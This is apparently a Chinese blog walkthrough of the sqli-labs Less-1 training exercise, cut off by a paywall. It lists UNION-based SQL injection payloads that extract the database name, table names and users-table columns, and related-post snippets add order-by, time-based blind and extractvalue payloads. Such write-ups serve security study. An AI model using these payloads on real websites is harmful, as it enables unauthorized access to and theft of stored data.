sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

原创

已于 2022-07-06 14:39:20 修改 · 552 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#数据库 #sql

于 2022-06-28 11:29:39 首次发布

本文详细介绍了SQL注入攻击的一种常见形式——基于错误的GET单引号字符型注入，通过sqli-lab的Less-1案例，展示了手工联合查询、报错型注入以及使用sqlmap工具进行数据爆破的过程，揭示了SQL注入的原理和防范措施。

方法一：手工UNION联合查询注入

输入单引号，页面报错，如下图所示

根据报错信息，可以确定输入参数的内容被存放到一对单引号中间，

猜想：咱们输入的1在数据库中出现的位置为：select ... from ... where id=’1’ ......，

也可以查看sqli-lab中less-1的php文件可以看到，和猜想一致，

多余的步骤不多说了，直接开始爆数据吧。

注意 id=非正确值

爆库payload

?id=-1' union select 1,2,database() --+

得到‘security’库名

爆表payload

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

查到 emails,referers,uagents,users ，显然users是用户数据表

爆列名（字段）payload

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

luosaierdadi

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

GET-ERROR based-Single quotes – String （GET型基于错误的单引号字符型注入） Less-1

water0diamond的博客

03-12

1019

关于数据库的一些基础，会在前一篇提前准备篇中提到首先打开网站首页，会发现如下界面：显示请输入id作为带数值的参数，那么下一步，我们就可以将参数传入试着提交然后看会有什么返回值。使用get方式提交id参数，这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。然后再测id类型是否为字符串，用单引号测试，出现‘’’说明id为字符串类型那么下面我们试着添加...

sqli-lab Less-1 GET - Error based - Single quotes - String

qq_45987965的博客

08-08

318

sqli-lab Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) ctf小白的学习笔记。 1. 判断有多少列，超出列数会报错通过输入?id=1' order by 正整数 --+ 说明有3列，即参数传递执行的查询有3个字段。此处有一点搞不懂，输进去1、2、3，为什么就显示两个值呢？查了资料发现，不是所有的查询都显示在网页前端的，为了确认能否返回前端，需要进行筛选（感觉这种方法有点像信号素）。通过?id =

2 条评论您还未登录，请先登录后发表或查看评论

2 条评论

游离态De猫 2023.07.06
很棒的文章，有一个点我不理解想请教，就是在最后一步取username和password值得时候，为什么要用 : 来分割呢？而不是用逗号[face]emoji:056.png[/face]

CSDN-Ada助手 2022.07.06
MySQL入门技能树或许可以帮到你：https://edu.csdn.net/skill/mysql?utm_source=AI_act_mysql

sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

luosaierdadi的博客

07-09

351

模拟真实环境，我们作为Dump用户使用Dump密码登陆，可以看到以下登陆成功此时打开hackbar选中post可以看到，已经自动载入的刚才提交的表单数据：我刚测试了一下，hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时，无论and后面是1=1还是1=2，都能登陆，不知道为什么，可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit，抓包修改参数。输入admin admin 登陆，抓包，发送到re

sqli lab page1-lesson1[GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)]

m0_68980215的博客

06-28

242

sqlilab,page1-lesson1

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

weixin_44368248的博客

04-14

855

1.根据图中的提示在url上加上?id=1 2.输入单引号，发现页面报错（通过在url中修改对应的id值。为正常数字、大数字、字符、（单引号、双引号、双单引号、括号）、反斜杆来探测url是否存在注入点）由报错信息可知，可以通过单引号闭合 3.通过order by +数字来判断当前的字段数，输入order by 10报错，输入order by 5还报错，输入order by 3没有报错，在输入or...

sqli-lab教程——Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

luosaierdadi的博客

07-06

436

如果看到这个报错信息，第一反应就是布尔型盲注、报错型注入、时间延迟型盲注了下面给出验证时间延迟型的盲注：http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+发现明显延迟，说明猜测正确。接下来的思路是通过延迟，依次爆破数据库长度，数据库名，表名，列名，以及字段。布尔型和时间延迟型盲注建议采用sqlmap去跑。其实本题不能称作盲注，因为存在回显，真正的盲注时不存在回显的，只能根据浏览器加载页面情况，判定是否注入成功。......

sqli-lab教程——Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

luosaierdadi的博客

07-08

652

不管怎么输入，回显总是you are ... 考虑时间型盲注，payload ?id=1' and sleep(3) --+ 注意id=1，发现明显延迟，说明注入成功，接下来爆破就完了。这道题的payload构造和第五题的方法一是一样的，一些废话就不多说了，这里就列一下过程，完事儿。爆库payload?id=1' and if(length(database())=4 , sleep(3), 1) --+ 发现当?id=1' and if(length(database())=8 , sleep(3), 1

sqli-lab教程——Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

luosaierdadi的博客

07-09

827

双引号报错型注入按照题意应该是可以使用上一题的payload只需要修改单引号为双引号，但是实际测试不行，无论我使用--+还是%23还是#都不行，我就看了一下php文件：可以看到sql查询语句：@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";构造一个能闭合语句而且会报错的payload：admin" and extractvalue(1,concat(0

sql-labs SQL注入平台-第1关Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

Onlyone_1314的博客

07-25

1595

记得把php.in中的转义参数magic_quotes_gpc配置成Off不然发送的请求参数中的符号会被加上\转义，从而无法直接拼接到SQL语句中去。

【sqli-labs】 less1 GET - Error based - Single quotes - String(GET型基于错误的单引号字符型注入)...

ajxi63204的博客

01-18

201

　　 GET方式提交id参数添加单引号，出现报错，爆出数据库名称和部分SQL语句 http://localhost/sqli/Less-1/?id=1' 使用order by猜测字段数，用#注释掉后面limit 0,1语句 http://localhost/sqli/Less-1/?id=1' order by 1# 字符#浏览器不会编码可以手动...

SQLI LABS | Less-1 GET - Error based - Single Quotes - String

最新发布

Blue17 の小窝

10-19

460

可以看到，我们已经成功获取了当前站点使用的后端数据库的信息。至此，SQLI LABS Less-1 GET - Error based - Single Quotes - String 成功过关。可以看到，当我们传递 Payload 04 给服务器后端时，页面显示了报错信息，并且还返回了部分后端的查询模板。既然能显示报错信息，那么本关我们就直接使用报错注入（使用 Union 联合注入也是可以的，但是，从本关的名称。作为参数进行查询，那我们就按它的意思传入。可以看到，服务器返回了对应。

sqli-labs练习(一）-------GET-Error based-Single quotes-String

wkend的博客

04-15

843

关于sqli-labs环境的搭建在这里不讲了，网上有很多，初始页面判断是否存在sql注入，输入1，成功返回了结果输入1',报错输入1' and 1=1%23,返回成功，输入1' and 1=2%23，没有返回结果此外，除了and,还有or,+,-等，不过要注意的一点是+号在url表示为%2b,-号不用表示根据以上结果，我们就可以判定这是字符型sq...

sqli-labs全通关（1-75）之Less-1 GET - Error based - Single quotes - String

guanrongl的专栏

08-05

623

3、用 and ‘1’='1 和 and ‘1’='2来判断，1’ and ‘1’ = '1,页面运行正常，而1’ and ‘1’ = '2,页面运行错误，则说明此 Sql 注入为字符型注入。2、用 and 1=1 和 and 1=2 来判断，两者都能正常回显则是字符型注入，否则是数字型注入。1、用减法判断：利用id=2-1 如果返回的是id=1的结果，则是数字注入，否则是字符注入。id=1’ order by 3 --+ // --+ 是注释。当 id=2-1，得到结果为Angelina ，

【SQLi-Labs】Less-1 Error based - Single quotes - String

xw1995115的博客

11-12

1084

第一课：基于报错的以单引号包裹的字符型注入 1. 根据黄字提示，传入参数ID http://10.1.2.210:8000/Less-1/?id=1 执行结果如下 2.根据题目提示，注入点基于报错，由单引号包裹，并且是字符型注入，判断源码大概为： select * from users where id = '$_GET['id']'; 3.构造查询找到回显数量及位置 ?id=1' order by 1 --+ ?id=1' order by 2 --+ ?id=1' ord..

sqli-lab教程——Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

luosaierdadi的博客

07-08

185

双引号字符型注入，上一题的单引号改成双引号就可以了,同样是两种方法：时间延迟型的手工盲注、报错型的手工盲注或者sqlmap，再有利用concat()几聚合数。步骤和第五题一样。

sqli-labs练习（五）------GET-Double injection-Single Quotes-String

wkend的博客

04-17

992

按提示，输入id参数1，得到回馈结果，但是没用输入1',报错查看报错信息near ''1'' LIMIT 0,1' at line 1 输入参数1'',没有报错，通过以上过程可以发现，当我们改变参数的时候，回显只有两种结果 1>You are in........... 2> 报错信息没办法，正确的查询只返回第一种情况，那么只能靠第二种回显结果了，...

#sqli-labs#Less-1

vircorns的博客

08-27

197

less-1：GET - Error based - Single quotes -String 首先尝试?id=1'，发现报错信息多了单引号 利用单引号闭合?id=1'and'1=1,注入成功常规流程：猜字段?id=1'order by 3%23,可以看到当字段为3时，回显正常 %23 是#url编码之后的值，因为sql语句在进入数据查询的时候会进行一次url解码，所以这个地方必须是...

【网络安全】sqli-labs Less-1 解题详析

等风来

04-27

3634

由以上可知，后端通过mysql_fetch_array()获取当前行数据，而注入语句返回的结果又是以行排序的，所以仅返回了位于首行的email表名。group_concat函数能将查询结果集合起来，在Payload2中，由于该函数集合了所有的表名到一行中，导致所有表名被回显。

sqli-labs——保姆级1~22闯关详解

sGanYu

08-06

2923

目录【Less-1】GET-Error based -Single quotes -String/错误的GET单引号字符串型注入【Less-2】GET-Error based -intiger based/错误的GET数值型注入【Less-3】GET-Error based -Single quotes with twist -String/错误的GET单引号变形括号型字符型注入【Less-4】GET-Error based - Double Quotes - String/错误的GET双.

MySQL注入实战指南——Sqli-labs教程解析

"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南，特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册，旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...